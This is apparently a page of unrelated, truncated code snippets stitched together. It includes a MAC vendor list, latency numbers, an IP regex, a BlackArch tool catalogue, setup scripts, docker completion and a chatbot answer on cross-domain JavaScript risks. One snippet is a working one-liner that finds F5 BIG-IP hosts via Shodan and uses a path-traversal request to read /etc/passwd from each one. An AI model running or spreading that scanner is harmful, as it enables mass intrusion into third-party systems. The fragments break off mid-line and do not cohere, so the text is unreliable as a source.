2018_04_24
000000 Officially Xerox | |
000001 SuperLAN-2U | |
000002 BBN (was internal usage only, no longer used) | |
000003 XEROX CORPORATION | |
000004 XEROX CORPORATION | |
000005 XEROX CORPORATION | |
000006 XEROX CORPORATION | |
000007 XEROX CORPORATION | |
000008 XEROX CORPORATION | |
000009 powerpipes? |
Latency Comparison Numbers (~2012) | |
---------------------------------- | |
L1 cache reference 0.5 ns | |
Branch mispredict 5 ns | |
L2 cache reference 7 ns 14x L1 cache | |
Mutex lock/unlock 25 ns | |
Main memory reference 100 ns 20x L2 cache, 200x L1 cache | |
Compress 1K bytes with Zippy 3,000 ns 3 us | |
Send 1K bytes over 1 Gbps network 10,000 ns 10 us | |
Read 4K randomly from SSD* 150,000 ns 150 us ~1GB/sec SSD |
# Constructed with help from | |
# http://stackoverflow.com/questions/53497/regular-expression-that-matches-valid-ipv6-addresses | |
# Try it on regex101: https://regex101.com/r/yVdrJQ/1 | |
import re | |
IPV4SEG = r'(?:25[0-5]|(?:2[0-4]|1{0,1}[0-9]){0,1}[0-9])' | |
IPV4ADDR = r'(?:(?:' + IPV4SEG + r'\.){3,3}' + IPV4SEG + r')' | |
IPV6SEG = r'(?:(?:[0-9a-fA-F]){1,4})' | |
IPV6GROUPS = ( |
shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done | |
#sudo apt install curl | |
#sudo apt install python3-shodan | |
#shodan init YOUR_API_KEY |
0d1n|210.78028eb|Web security tool to make fuzzing at HTTP inputs, made in C with libCurl.| blackarch-webapp |https://github.com/CoolerVoid/0d1n | |
0trace|1.5|A hop enumeration tool.| blackarch-scanner |http://jon.oberheide.org/0trace/ | |
3proxy|0.8.13|Tiny free proxy server.| blackarch-proxy |http://3proxy.ru/ | |
3proxy-win32|0.8.13|Tiny free proxy server.| blackarch-windows |http://3proxy.ru/ | |
42zip|42|Recursive Zip archive bomb.| blackarch-dos |http://blog.fefe.de/?ts=b6cea88d | |
a2sv|135.973ba13|Auto Scanning to SSL Vulnerability.| blackarch-scanner |https://github.com/hahwul/a2sv | |
abcd|4.2738809|ActionScript ByteCode Disassembler.| blackarch-disassembler |https://github.com/MITRECND/abcd | |
abuse-ssl-bypass-waf|5.3ffd16a|Bypassing WAF by abusing SSL/TLS Ciphers.| blackarch-webapp |https://github.com/LandGrey/abuse-ssl-bypass-waf | |
acccheck|0.2.1|A password dictionary attack tool that targets windows authentication via the SMB protocol.| blackarch-cracker |http://labs.portcullis.co.uk/tools/acccheck/ | |
ace|1.10|Automated Corp |
# This file is part of IVRE. | |
# Copyright 2011 - 2019 Pierre LALET <pierre.lalet@cea.fr> | |
# | |
# IVRE is free software: you can redistribute it and/or modify it | |
# under the terms of the GNU General Public License as published by | |
# the Free Software Foundation, either version 3 of the License, or | |
# (at your option) any later version. | |
# | |
# IVRE is distributed in the hope that it will be useful, but WITHOUT | |
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY |
#sudo apt-get purge python3-pip rubygems ruby-dev -y | |
#sudo rm -rf /usr/local/go | |
git clone https://github.com/anyenv/anyenv ~/.anyenv | |
export PATH="$HOME/.anyenv/bin:$PATH" | |
echo 'export PATH=$HOME/.anyenv/bin:$PATH' >> ~/.zshrc | |
echo 'eval "$(anyenv init -)"' >> ~/.zshrc | |
~/.anyenv/bin/anyenv init | |
eval "$(anyenv init -)" | |
yes | anyenv install --init | |
# Anyenv Plugins |
`docker -v` | |
Docker version 24.0.5, build ced0996 | |
`docker completion zsh` | |
```bash | |
compdef _docker docker | |
# zsh completion for docker -*- shell-script -*- | |
__docker_debug() |
Chattin Chit up wiht ChatChapata
Q: Cross-Domain Javascript Source FIle Inclusion - why is this a potential websecurity risk exactly? A: Cross-Domain JavaScript Source File Inclusion refers to the practice of including JavaScript files from a different domain into a web page. This can pose several web security risks:
Loss of Control: By including JavaScript from an external domain, you lose control over the content. If the external domain is compromised, the attacker can modify the JavaScript code to include malicious behavior. Same-Origin Policy (SOP) Bypass: If improperly implemented, cross-domain inclusion can lead to bypassing the SOP. This might allow malicious scripts to access and interact with the content of your site, leading to potential data theft or unauthorized actions on behalf of the user. Data Leakage: Information can be leaked to third parties through the included scripts, potentially exposing sensitive user data. Dependency on External Availability: Your site's functionality might becom